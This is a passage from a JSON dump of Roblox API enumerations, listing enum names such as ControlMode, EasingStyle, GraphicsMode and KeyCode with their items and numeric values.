mItem","Name":"MouseLockSwitch","tags":[],"Value":1,"Enum":"ControlMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":0,"Enum":"ControlMode"},{"type":"Enum","Name":"CoreGuiType","tags":[]},{"type":"EnumItem","Name":"PlayerList","tags":[],"Value":0,"Enum":"CoreGuiType"},{"type":"EnumItem","Name":"Health","tags":[],"Value":1,"Enum":"CoreGuiType"},{"type":"EnumItem","Name":"Backpack","tags":[],"Value":2,"Enum":"CoreGuiType"},{"type":"EnumItem","Name":"Chat","tags":[],"Value":3,"Enum":"CoreGuiType"},{"type":"EnumItem","Name":"All","tags":[],"Value":4,"Enum":"CoreGuiType"},{"type":"Enum","Name":"CreatorType","tags":[]},{"type":"EnumItem","Name":"User","tags":[],"Value":0,"Enum":"CreatorType"},{"type":"EnumItem","Name":"Group","tags":[],"Value":1,"Enum":"CreatorType"},{"type":"Enum","Name":"CurrencyType","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"CurrencyType"},{"type":"EnumItem","Name":"Robux","tags":[],"Value":1,"Enum":"CurrencyType"},{"type":"EnumItem","Name":"Tix","tags":[],"Value":2,"Enum":"CurrencyType"},{"type":"Enum","Name":"CustomCameraMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"CustomCameraMode"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":2,"Enum":"CustomCameraMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":1,"Enum":"CustomCameraMode"},{"type":"Enum","Name":"DevCameraOcclusionMode","tags":[]},{"type":"EnumItem","Name":"Zoom","tags":[],"Value":0,"Enum":"DevCameraOcclusionMode"},{"type":"EnumItem","Name":"Invisicam","tags":[],"Value":1,"Enum":"DevCameraOcclusionMode"},{"type":"Enum","Name":"DevComputerCameraMovementMode","tags":[]},{"type":"EnumItem","Name":"UserChoice","tags":[],"Value":0,"Enum":"DevComputerCameraMovementMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":1,"Enum":"DevComputerCameraMovementMode"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":2,"Enum":"DevComputerCameraMovementMode"},{"type":"Enum","Name":"DevComputerMovementMode","tags":[]},{"type":"EnumItem","Name":"UserChoice","tags":[],"Value":0,"Enum":"DevComputerMovementMode"},{"type":"EnumItem","Name":"KeyboardMouse","tags":[],"Value":1,"Enum":"DevComputerMovementMode"},{"type":"EnumItem","Name":"ClickToMove","tags":[],"Value":2,"Enum":"DevComputerMovementMode"},{"type":"EnumItem","Name":"Scriptable","tags":[],"Value":3,"Enum":"DevComputerMovementMode"},{"type":"Enum","Name":"DevTouchCameraMovementMode","tags":[]},{"type":"EnumItem","Name":"UserChoice","tags":[],"Value":0,"Enum":"DevTouchCameraMovementMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":1,"Enum":"DevTouchCameraMovementMode"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":2,"Enum":"DevTouchCameraMovementMode"},{"type":"Enum","Name":"DevTouchMovementMode","tags":[]},{"type":"EnumItem","Name":"UserChoice","tags":[],"Value":0,"Enum":"DevTouchMovementMode"},{"type":"EnumItem","Name":"Thumbstick","tags":[],"Value":1,"Enum":"DevTouchMovementMode"},{"type":"EnumItem","Name":"DPad","tags":[],"Value":2,"Enum":"DevTouchMovementMode"},{"type":"EnumItem","Name":"Thumbpad","tags":[],"Value":3,"Enum":"DevTouchMovementMode"},{"type":"EnumItem","Name":"ClickToMove","tags":[],"Value":4,"Enum":"DevTouchMovementMode"},{"type":"EnumItem","Name":"Scriptable","tags":[],"Value":5,"Enum":"DevTouchMovementMode"},{"type":"Enum","Name":"DialogPurpose","tags":[]},{"type":"EnumItem","Name":"Quest","tags":[],"Value":0,"Enum":"DialogPurpose"},{"type":"EnumItem","Name":"Help","tags":[],"Value":1,"Enum":"DialogPurpose"},{"type":"EnumItem","Name":"Shop","tags":[],"Value":2,"Enum":"DialogPurpose"},{"type":"Enum","Name":"DialogTone","tags":[]},{"type":"EnumItem","Name":"Neutral","tags":[],"Value":0,"Enum":"DialogTone"},{"type":"EnumItem","Name":"Friendly","tags":[],"Value":1,"Enum":"DialogTone"},{"type":"EnumItem","Name":"Enemy","tags":[],"Value":2,"Enum":"DialogTone"},{"type":"Enum","Name":"EasingDirection","tags":[]},{"type":"EnumItem","Name":"In","tags":[],"Value":0,"Enum":"EasingDirection"},{"type":"EnumItem","Name":"Out","tags":[],"Value":1,"Enum":"EasingDirection"},{"type":"EnumItem","Name":"InOut","tags":[],"Value":2,"Enum":"EasingDirection"},{"type":"Enum","Name":"EasingStyle","tags":[]},{"type":"EnumItem","Name":"Linear","tags":[],"Value":0,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Sine","tags":[],"Value":1,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Back","tags":[],"Value":2,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Quad","tags":[],"Value":3,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Quart","tags":[],"Value":4,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Quint","tags":[],"Value":5,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Bounce","tags":[],"Value":6,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Elastic","tags":[],"Value":7,"Enum":"EasingStyle"},{"type":"Enum","Name":"EnviromentalPhysicsThrottle","tags":[]},{"type":"EnumItem","Name":"DefaultAuto","tags":[],"Value":0,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Disabled","tags":[],"Value":1,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Always","tags":[],"Value":2,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Skip2","tags":[],"Value":3,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Skip4","tags":[],"Value":4,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Skip8","tags":[],"Value":5,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Skip16","tags":[],"Value":6,"Enum":"EnviromentalPhysicsThrottle"},{"type":"Enum","Name":"ErrorReporting","tags":[]},{"type":"EnumItem","Name":"DontReport","tags":[],"Value":0,"Enum":"ErrorReporting"},{"type":"EnumItem","Name":"Prompt","tags":[],"Value":1,"Enum":"ErrorReporting"},{"type":"EnumItem","Name":"Report","tags":[],"Value":2,"Enum":"ErrorReporting"},{"type":"Enum","Name":"ExplosionType","tags":[]},{"type":"EnumItem","Name":"NoCraters","tags":[],"Value":0,"Enum":"ExplosionType"},{"type":"EnumItem","Name":"Craters","tags":[],"Value":1,"Enum":"ExplosionType"},{"type":"EnumItem","Name":"CratersAndDebris","tags":[],"Value":2,"Enum":"ExplosionType"},{"type":"Enum","Name":"FilterResult","tags":[]},{"type":"EnumItem","Name":"Rejected","tags":[],"Value":1,"Enum":"FilterResult"},{"type":"EnumItem","Name":"Accepted","tags":[],"Value":0,"Enum":"FilterResult"},{"type":"Enum","Name":"Font","tags":[]},{"type":"EnumItem","Name":"Legacy","tags":[],"Value":0,"Enum":"Font"},{"type":"EnumItem","Name":"Arial","tags":[],"Value":1,"Enum":"Font"},{"type":"EnumItem","Name":"ArialBold","tags":[],"Value":2,"Enum":"Font"},{"type":"EnumItem","Name":"SourceSans","tags":[],"Value":3,"Enum":"Font"},{"type":"EnumItem","Name":"SourceSansBold","tags":[],"Value":4,"Enum":"Font"},{"type":"EnumItem","Name":"SourceSansLight","tags":[],"Value":5,"Enum":"Font"},{"type":"EnumItem","Name":"SourceSansItalic","tags":[],"Value":6,"Enum":"Font"},{"type":"Enum","Name":"FontSize","tags":[]},{"type":"EnumItem","Name":"Size8","tags":[],"Value":0,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size9","tags":[],"Value":1,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size10","tags":[],"Value":2,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size11","tags":[],"Value":3,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size12","tags":[],"Value":4,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size14","tags":[],"Value":5,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size18","tags":[],"Value":6,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size24","tags":[],"Value":7,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size36","tags":[],"Value":8,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size48","tags":[],"Value":9,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size28","tags":[],"Value":10,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size32","tags":[],"Value":11,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size42","tags":[],"Value":12,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size60","tags":[],"Value":13,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size96","tags":[],"Value":14,"Enum":"FontSize"},{"type":"Enum","Name":"FormFactor","tags":[]},{"type":"EnumItem","Name":"Symmetric","tags":[],"Value":0,"Enum":"FormFactor"},{"type":"EnumItem","Name":"Brick","tags":[],"Value":1,"Enum":"FormFactor"},{"type":"EnumItem","Name":"Plate","tags":[],"Value":2,"Enum":"FormFactor"},{"type":"EnumItem","Name":"Custom","tags":[],"Value":3,"Enum":"FormFactor"},{"type":"Enum","Name":"FrameStyle","tags":[]},{"type":"EnumItem","Name":"Custom","tags":[],"Value":0,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"ChatBlue","tags":[],"Value":1,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"RobloxSquare","tags":[],"Value":2,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"RobloxRound","tags":[],"Value":3,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"ChatGreen","tags":[],"Value":4,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"ChatRed","tags":[],"Value":5,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"DropShadow","tags":[],"Value":6,"Enum":"FrameStyle"},{"type":"Enum","Name":"FramerateManagerMode","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"FramerateManagerMode"},{"type":"EnumItem","Name":"On","tags":[],"Value":1,"Enum":"FramerateManagerMode"},{"type":"EnumItem","Name":"Off","tags":[],"Value":2,"Enum":"FramerateManagerMode"},{"type":"Enum","Name":"FriendRequestEvent","tags":[]},{"type":"EnumItem","Name":"Issue","tags":[],"Value":0,"Enum":"FriendRequestEvent"},{"type":"EnumItem","Name":"Revoke","tags":[],"Value":1,"Enum":"FriendRequestEvent"},{"type":"EnumItem","Name":"Accept","tags":[],"Value":2,"Enum":"FriendRequestEvent"},{"type":"EnumItem","Name":"Deny","tags":[],"Value":3,"Enum":"FriendRequestEvent"},{"type":"Enum","Name":"FriendStatus","tags":[]},{"type":"EnumItem","Name":"Unknown","tags":[],"Value":0,"Enum":"FriendStatus"},{"type":"EnumItem","Name":"NotFriend","tags":[],"Value":1,"Enum":"FriendStatus"},{"type":"EnumItem","Name":"Friend","tags":[],"Value":2,"Enum":"FriendStatus"},{"type":"EnumItem","Name":"FriendRequestSent","tags":[],"Value":3,"Enum":"FriendStatus"},{"type":"EnumItem","Name":"FriendRequestReceived","tags":[],"Value":4,"Enum":"FriendStatus"},{"type":"Enum","Name":"FunctionalTestResult","tags":[]},{"type":"EnumItem","Name":"Passed","tags":[],"Value":0,"Enum":"FunctionalTestResult"},{"type":"EnumItem","Name":"Warning","tags":[],"Value":1,"Enum":"FunctionalTestResult"},{"type":"EnumItem","Name":"Error","tags":[],"Value":2,"Enum":"FunctionalTestResult"},{"type":"Enum","Name":"GearGenreSetting","tags":[]},{"type":"EnumItem","Name":"AllGenres","tags":[],"Value":0,"Enum":"GearGenreSetting"},{"type":"EnumItem","Name":"MatchingGenreOnly","tags":[],"Value":1,"Enum":"GearGenreSetting"},{"type":"Enum","Name":"GearType","tags":[]},{"type":"EnumItem","Name":"MeleeWeapons","tags":[],"Value":0,"Enum":"GearType"},{"type":"EnumItem","Name":"RangedWeapons","tags":[],"Value":1,"Enum":"GearType"},{"type":"EnumItem","Name":"Explosives","tags":[],"Value":2,"Enum":"GearType"},{"type":"EnumItem","Name":"PowerUps","tags":[],"Value":3,"Enum":"GearType"},{"type":"EnumItem","Name":"NavigationEnhancers","tags":[],"Value":4,"Enum":"GearType"},{"type":"EnumItem","Name":"MusicalInstruments","tags":[],"Value":5,"Enum":"GearType"},{"type":"EnumItem","Name":"SocialItems","tags":[],"Value":6,"Enum":"GearType"},{"type":"EnumItem","Name":"BuildingTools","tags":[],"Value":7,"Enum":"GearType"},{"type":"EnumItem","Name":"Transport","tags":[],"Value":8,"Enum":"GearType"},{"type":"Enum","Name":"Genre","tags":[]},{"type":"EnumItem","Name":"All","tags":[],"Value":0,"Enum":"Genre"},{"type":"EnumItem","Name":"TownAndCity","tags":[],"Value":1,"Enum":"Genre"},{"type":"EnumItem","Name":"Fantasy","tags":[],"Value":2,"Enum":"Genre"},{"type":"EnumItem","Name":"SciFi","tags":[],"Value":3,"Enum":"Genre"},{"type":"EnumItem","Name":"Ninja","tags":[],"Value":4,"Enum":"Genre"},{"type":"EnumItem","Name":"Scary","tags":[],"Value":5,"Enum":"Genre"},{"type":"EnumItem","Name":"Pirate","tags":[],"Value":6,"Enum":"Genre"},{"type":"EnumItem","Name":"Adventure","tags":[],"Value":7,"Enum":"Genre"},{"type":"EnumItem","Name":"Sports","tags":[],"Value":8,"Enum":"Genre"},{"type":"EnumItem","Name":"Funny","tags":[],"Value":9,"Enum":"Genre"},{"type":"EnumItem","Name":"WildWest","tags":[],"Value":10,"Enum":"Genre"},{"type":"EnumItem","Name":"War","tags":[],"Value":11,"Enum":"Genre"},{"type":"EnumItem","Name":"SkatePark","tags":[],"Value":12,"Enum":"Genre"},{"type":"EnumItem","Name":"Tutorial","tags":[],"Value":13,"Enum":"Genre"},{"type":"Enum","Name":"GraphicsMode","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":1,"Enum":"GraphicsMode"},{"type":"EnumItem","Name":"Direct3D9","tags":[],"Value":3,"Enum":"GraphicsMode"},{"type":"EnumItem","Name":"Direct3D11","tags":[],"Value":2,"Enum":"GraphicsMode"},{"type":"EnumItem","Name":"OpenGL","tags":[],"Value":4,"Enum":"GraphicsMode"},{"type":"EnumItem","Name":"NoGraphics","tags":[],"Value":5,"Enum":"GraphicsMode"},{"type":"Enum","Name":"HandlesStyle","tags":[]},{"type":"EnumItem","Name":"Resize","tags":[],"Value":0,"Enum":"HandlesStyle"},{"type":"EnumItem","Name":"Movement","tags":[],"Value":1,"Enum":"HandlesStyle"},{"type":"Enum","Name":"HttpContentType","tags":[]},{"type":"EnumItem","Name":"ApplicationJson","tags":[],"Value":0,"Enum":"HttpContentType"},{"type":"EnumItem","Name":"ApplicationXml","tags":[],"Value":1,"Enum":"HttpContentType"},{"type":"EnumItem","Name":"ApplicationUrlEncoded","tags":[],"Value":2,"Enum":"HttpContentType"},{"type":"EnumItem","Name":"TextPlain","tags":[],"Value":3,"Enum":"HttpContentType"},{"type":"EnumItem","Name":"TextXml","tags":[],"Value":4,"Enum":"HttpContentType"},{"type":"Enum","Name":"HumanoidDisplayDistanceType","tags":[]},{"type":"EnumItem","Name":"Viewer","tags":[],"Value":0,"Enum":"HumanoidDisplayDistanceType"},{"type":"EnumItem","Name":"Subject","tags":[],"Value":1,"Enum":"HumanoidDisplayDistanceType"},{"type":"EnumItem","Name":"None","tags":[],"Value":2,"Enum":"HumanoidDisplayDistanceType"},{"type":"Enum","Name":"HumanoidRigType","tags":[]},{"type":"EnumItem","Name":"R6","tags":[],"Value":0,"Enum":"HumanoidRigType"},{"type":"EnumItem","Name":"R15","tags":[],"Value":1,"Enum":"HumanoidRigType"},{"type":"Enum","Name":"HumanoidStateType","tags":[]},{"type":"EnumItem","Name":"FallingDown","tags":[],"Value":0,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Running","tags":[],"Value":8,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"RunningNoPhysics","tags":[],"Value":10,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Climbing","tags":[],"Value":12,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"StrafingNoPhysics","tags":[],"Value":11,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Ragdoll","tags":[],"Value":1,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"GettingUp","tags":[],"Value":2,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Jumping","tags":[],"Value":3,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Landed","tags":[],"Value":7,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Flying","tags":[],"Value":6,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Freefall","tags":[],"Value":5,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Seated","tags":[],"Value":13,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"PlatformStanding","tags":[],"Value":14,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Dead","tags":[],"Value":15,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Swimming","tags":[],"Value":4,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Physics","tags":[],"Value":16,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"None","tags":[],"Value":18,"Enum":"HumanoidStateType"},{"type":"Enum","Name":"InOut","tags":[]},{"type":"EnumItem","Name":"Edge","tags":[],"Value":0,"Enum":"InOut"},{"type":"EnumItem","Name":"Inset","tags":[],"Value":1,"Enum":"InOut"},{"type":"EnumItem","Name":"Center","tags":[],"Value":2,"Enum":"InOut"},{"type":"Enum","Name":"InfoType","tags":[]},{"type":"EnumItem","Name":"Asset","tags":[],"Value":0,"Enum":"InfoType"},{"type":"EnumItem","Name":"Product","tags":[],"Value":1,"Enum":"InfoType"},{"type":"Enum","Name":"InputType","tags":[]},{"type":"EnumItem","Name":"NoInput","tags":[],"Value":0,"Enum":"InputType"},{"type":"EnumItem","Name":"LeftTread","tags":[],"Value":1,"Enum":"InputType"},{"type":"EnumItem","Name":"RightTread","tags":[],"Value":2,"Enum":"InputType"},{"type":"EnumItem","Name":"Steer","tags":[],"Value":3,"Enum":"InputType"},{"type":"EnumItem","Name":"Throtle","tags":[],"Value":4,"Enum":"InputType"},{"type":"EnumItem","Name":"UpDown","tags":[],"Value":6,"Enum":"InputType"},{"type":"EnumItem","Name":"Action1","tags":[],"Value":7,"Enum":"InputType"},{"type":"EnumItem","Name":"Action2","tags":[],"Value":8,"Enum":"InputType"},{"type":"EnumItem","Name":"Action3","tags":[],"Value":9,"Enum":"InputType"},{"type":"EnumItem","Name":"Action4","tags":[],"Value":10,"Enum":"InputType"},{"type":"EnumItem","Name":"Action5","tags":[],"Value":11,"Enum":"InputType"},{"type":"EnumItem","Name":"Constant","tags":[],"Value":12,"Enum":"InputType"},{"type":"EnumItem","Name":"Sin","tags":[],"Value":13,"Enum":"InputType"},{"type":"Enum","Name":"JointCreationMode","tags":[]},{"type":"EnumItem","Name":"All","tags":[],"Value":0,"Enum":"JointCreationMode"},{"type":"EnumItem","Name":"Surface","tags":[],"Value":1,"Enum":"JointCreationMode"},{"type":"EnumItem","Name":"None","tags":[],"Value":2,"Enum":"JointCreationMode"},{"type":"Enum","Name":"JointType","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":22,"Enum":"JointType"},{"type":"EnumItem","Name":"Rotate","tags":[],"Value":6,"Enum":"JointType"},{"type":"EnumItem","Name":"RotateP","tags":[],"Value":7,"Enum":"JointType"},{"type":"EnumItem","Name":"RotateV","tags":[],"Value":8,"Enum":"JointType"},{"type":"EnumItem","Name":"Glue","tags":[],"Value":9,"Enum":"JointType"},{"type":"EnumItem","Name":"Weld","tags":[],"Value":1,"Enum":"JointType"},{"type":"EnumItem","Name":"Snap","tags":[],"Value":3,"Enum":"JointType"},{"type":"Enum","Name":"KeyCode","tags":[]},{"type":"EnumItem","Name":"Unknown","tags":[],"Value":0,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Backspace","tags":[],"Value":8,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Tab","tags":[],"Value":9,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Clear","tags":[],"Value":12,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Return","tags":[],"Value":13,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Pause","tags":[],"Value":19,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Escape","tags":[],"Value":27,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Space","tags":[],"Value":32,"Enum":"KeyCode"},{"type":"EnumItem","Name":"QuotedDouble","tags":[],"Value":34,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Hash","tags":[],"Value":35,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Dollar","tags":[],"Value":36,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Percent","tags":[],"Value":37,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Ampersand","tags":[],"Value":38,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Quote","tags":[],"Value":39,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftParenthesis","tags":[],"Value":40,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightParenthesis","tags":[],"Value":41,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Asterisk","tags":[],"Value":42,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Plus","tags":[],"Value":43,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Comma","tags":[],"Value":44,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Minus","tags":[],"Value":45,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Period","tags":[],"Value":46,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Slash","tags":[],"Value":47,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Zero","tags":[],"Value":48,"Enum":"KeyCode"},{"type":"EnumItem","Name":"One","tags":[],"Value":49,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Two","tags":[],"Value":50,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Three","tags":[],"Value":51,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Four","tags":[],"Value":52,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Five","tags":[],"Value":53,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Six","tags":[],"Value":54,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Seven","tags":[],"Value":55,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Eight","tags":[],"Value":56,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Nine","tags":[],"Value":57,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Colon","tags":[],"Value":58,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Semicolon","tags":[],"Value":59,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LessThan","tags":[],"Value":60,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Equals","tags":[],"Value":61,"Enum":"KeyCode"},{"type":"EnumItem","Name":"GreaterThan","tags":[],"Value":62,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Question","tags":[],"Value":63,"Enum":"KeyCode"},{"type":"EnumItem","Name":"At","tags":[],"Value":64,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftBracket","tags":[],"Value":91,"Enum":"KeyCode"},{"type":"EnumItem","Name":"BackSlash","tags":[],"Value":92,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightBracket","tags":[],"Value":93,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Caret","tags":[],"Value":94,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Underscore","tags":[],"Value":95,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Backquote","tags":[],"Value":96,"Enum":"KeyCode"},{"type":"EnumItem","Name":"A","tags":[],"Value":97,"Enum":"KeyCode"},{"type":"EnumItem","Name":"B","tags":[],"Value":98,"Enum":"KeyCode"},{"type":"EnumItem","Name":"C","tags":[],"Value":99,"Enum":"KeyCode"},{"type":"EnumItem","Name":"D","tags":[],"Value":100,"Enum":"KeyCode"},{"type":"EnumItem","Name":"E","tags":[],"Value":101,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F","tags":[],"Value":102,"Enum":"KeyCode"},{"type":"EnumItem","Name":"G","tags":[],"Value":103,"Enum":"KeyCode"},{"type":"EnumItem","Name":"H","tags":[],"Value":104,"Enum":"KeyCode"},{"type":"EnumItem","Name":"I","tags":[],"Value":105,"Enum":"KeyCode"},{"type":"EnumItem","Name":"J","tags":[],"Value":106,"Enum":"KeyCode"},{"type":"EnumItem","Name":"K","tags":[],"Value":107,"Enum":"KeyCode"},{"type":"EnumItem","Name":"L","tags":[],"Value":108,"Enum":"KeyCode"},{"type":"EnumItem","Name":"M","tags":[],"Value":109,"Enum":"KeyCode"},{"type":"EnumItem","Name":"N","tags":[],"Value":110,"Enum":"KeyCode"},{"type":"EnumItem","Name":"O","tags":[],"Value":111,"Enum":"KeyCode"},{"type":"EnumItem","Name":"P","tags":[],"Value":112,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Q","tags":[],"Value":113,"Enum":"KeyCode"},{"type":"EnumItem","Name":"R","tags":[],"Value":114,"Enum":"KeyCode"},{"type":"EnumItem","Name":"S","tags":[],"Value":115,"Enum":"KeyCode"},{"type":"EnumItem","Name":"T","tags":[],"Value":116,"Enum":"KeyCode"},{"type":"EnumItem","Name":"U","tags":[],"Value":117,"Enum":"KeyCode"},{"type":"EnumItem","Name":"V","tags":[],"Value":118,"Enum":"KeyCode"},{"type":"EnumItem","Name":"W","tags":[],"Value":119,"Enum":"KeyCode"},{"type":"EnumItem","Name":"X","tags":[],"Value":120,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Y","tags":[],"Value":121,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Z","tags":[],"Value":122,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftCurly","tags":[],"Value":123,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Pipe","tags":[],"Value":124,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightCurly","tags":[],"Value":125,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Tilde","tags":[],"Value":126,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Delete","tags":[],"Value":127,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadZero","tags":[],"Value":256,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadOne","tags":[],"Value":257,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadTwo","tags":[],"Value":258,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadThree","tags":[],"Value":259,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadFour","tags":[],"Value":260,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadFive","tags":[],"Value":261,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadSix","tags":[],"Value":262,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadSeven","tags":[],"Value":263,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadEight","tags":[],"Value":264,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadNine","tags":[],"Value":265,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadPeriod","tags":[],"Value":266,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadDivide","tags":[],"Value":267,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadMultiply","tags":[],"Value":268,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadMinus","tags":[],"Value":269,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadPlus","tags":[],"Value":270,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadEnter","tags":[],"Value":271,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadEquals","tags":[],"Value":272,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Up","tags":[],"Value":273,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Down","tags":[],"Value":274,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Right","tags":[],"Value":275,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Left","tags":[],"Value":276,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Insert","tags":[],"Value":277,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Home","tags":[],"Value":278,"Enum":"KeyCode"},{"type":"EnumItem","Name":"End","tags":[],"Value":279,"Enum":"KeyCode"},{"type":"EnumItem","Name":"PageUp","tags":[],"Value":280,"Enum":"KeyCode"},{"type":"EnumItem","Name":"PageDown","tags":[],"Value":281,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftShift","tags":[],"Value":304,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightShift","tags":[],"Value":303,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftMeta","tags":[],"Value":310,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightMeta","tags":[],"Value":309,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftAlt","tags":[],"Value":308,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightAlt","tags":[],"Value":307,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftControl","tags":[],"Value":306,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightControl","tags":[],"Value":305,"Enum":"KeyCode"},{"type":"EnumItem","Name":"CapsLock","tags":[],"Value":301,"Enum":"KeyCode"},{"type":"EnumItem","Name":"NumLock","tags":[],"Value":300